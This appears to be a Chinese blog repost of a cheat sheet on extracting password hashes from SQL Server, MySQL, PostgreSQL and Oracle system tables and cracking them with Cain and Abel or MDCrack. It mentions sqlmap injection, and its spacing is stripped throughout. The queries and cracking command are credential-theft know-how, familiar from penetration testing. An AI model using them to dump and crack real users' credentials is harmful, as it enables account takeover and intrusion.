有没access也可以抓取的?

  各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具!

  SQLServer2000:-

  SELECTpasswordfrommaster。dbo。sysxloginswherename='sa'

  0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

  2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

  0×0100-constantheader

  34767D5C-salt

  0CFA5FDCA28C4A56085E65E882E71CB0ED250341-casesenstivehash

  2FD54D6119FFF04129A1D72E7C3194F7284A7F3A-uppercasehash

  cracktheuppercasehashin'cainandabel'andthenworkthecasesentivehash

  SQLserver2005:-

  SELECTpassword_hashFROMsys。sql_loginswherename='sa'

  0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

  0×0100-constantheader

  993BF231-salt

  5F36CC441485B35C4D84687DC02C78B0E680411F-casesensitivehash

  crackcasesensitivehashincain,trybruteforceanddictionarybasedattacks。

  update:-followingbernardo'scomments:-

  usefunctionfn_varbintohexstr()tocastpasswordinahexstring。

  e。g。selectnamefromsysxloginsunionallselectmaster。dbo。fn_varbintohexstr(password)fromsysxlogins

  MYSQL:-

  InMySQLyoucangeneratehashesinternallyusingthepassword(),md5(),orsha1functions。password()isthefunctionusedforMySQL'sownuserauthenticationsystem。Itreturnsa16-bytestringforMySQLversionspriorto4。1,anda41-bytestring(basedonadoubleSHA-1hash)forversions4。1andup。md5()isavailablefromMySQLversion3。23。2andsha1()wasaddedlaterin4。0。2。

  *mysql<4。1

  mysql>SELECTPASSWORD('mypass');

  +——————–+

  |PASSWORD('mypass')|

  +——————–+

  |6f8c114b58f2ce9e|

  +——————–+

  *mysql>=4。1

  mysql>SELECTPASSWORD('mypass');

  +——————————————-+

  |PASSWORD('mypass')|

  +——————————————-+

  |*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4|

  +——————————————-+

  Selectuser,passwordfrommysql。user

  Thehashescanbecrackedin'cainandabel'

  Postgres:-

  PostgreskeepsMD5-basedpasswordhashesfordatabase-levelusersinthepg_shadowtable。Youneedtobethedatabasesuperusertoreadthistable(usuallycalled"postgres"or"pgsql")

  selectusename,passwdfrompg_shadow;

  usename|passwd

  ——————+————————————-

  testuser|md5fabb6d7172aadfda4753bf0507ed4396

  usemdcracktocrackthesehashes:-

  $wineMDCrack-sse。exe–algorithm=MD5–append=testuserfabb6d7172aadfda4753bf0507ed4396

  Oracle:-

  selectname,password,spare4fromsys。user$

  hashescouldbecrackedusing'cainandabel'orthc-orakelcrackert11g

  MoreonOraclelater,iamabitbored…。

文章如转载,请注明转载自:http://www.5iadmin.com/post/76.html